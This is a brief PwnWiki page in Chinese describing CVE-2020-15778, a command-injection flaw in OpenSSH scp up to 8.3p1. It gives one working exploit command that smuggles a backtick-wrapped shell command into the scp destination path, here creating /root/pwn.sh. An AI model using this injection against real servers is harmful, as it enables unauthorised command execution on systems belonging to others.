CVE-2020-15778 Openssh命令注入漏洞

From PwnWiki

Revision as of 15:06, 26 February 2021 by Pwnwiki (talk | contribs) (→‎CVE-2020-15778 Openssh命令注入漏洞)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本：

Openssh<=8.3p1

利用方法：

scp / hello.txt [email protected]:'`touch /root/pwn.sh`/root'

傳輸hello.txt到/root目錄下，並且執行命令 touch /root/pwn.sh

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-15778_Openssh命令注入漏洞&oldid=15"